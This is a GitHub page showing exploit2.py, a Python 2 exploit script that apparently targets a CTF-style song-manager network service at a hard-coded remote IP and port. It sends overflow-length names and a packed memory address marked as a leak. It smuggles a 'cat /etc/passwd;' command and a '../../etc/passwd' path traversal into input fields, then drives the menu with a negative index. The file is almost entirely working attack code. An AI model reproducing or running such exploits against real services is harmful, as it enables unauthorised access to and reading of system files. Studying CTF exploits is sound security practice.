-
Notifications
You must be signed in to change notification settings - Fork 68
/
Copy pathexploit2.py
81 lines (65 loc) · 1.31 KB
/
exploit2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import socket
from struct import pack,unpack
from ctypes import c_int32
import telnetlib,time
REMOTE = ('54.92.45.49',32902)
LOCAL = ('192.168.55.128',31337)
BUFFER = 4096
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(LOCAL)
def recv_until(str,debug=1):
recv_ = ''
while not str in recv_:
tmp = s.recv(BUFFER)
recv_ += tmp
if debug:
print tmp
continue
return recv_
## CREATE SONG
s.send('1\n')
recv_until('Name:')
name = "a"*239
s.send(name+'\n')
recv_until('Artist')
s.send(name+'\n')
recv_until('size')
s.send('8\n')
recv_until('Lyric')
s.send('a\n')
recv_until('Exit')
## CREATE SONG
s.send('1\n')
recv_until('Name:')
name = pack('<I',0x0804b014 ) # leak
name += pack('<I',0x41414141 )
name += "cat /etc/passwd;"
name = name.ljust(94,'/')
s.send(name+'\n')
recv_until('Artist')
name = "../../etc/passwd"
s.send(name+'\n')
recv_until('size')
s.send('8\n')
recv_until('Lyric')
s.send('a\n')
recv_until('Exit')
s.send('4\n')
recv_until('name')
s.send('hihi\n')
recv_until('ID')
s.send('0\n')
recv_until('ID')
s.send('0\n')
recv_until('ID')
s.send('0\n')
recv_until('ID')
s.send('0\n')
recv_until('ID')
s.send('1\n')
recv_until('ID')
s.send('-1\n')
recv_until('Exit')
s.send('7\n')
recv_until('Exit')
s.close()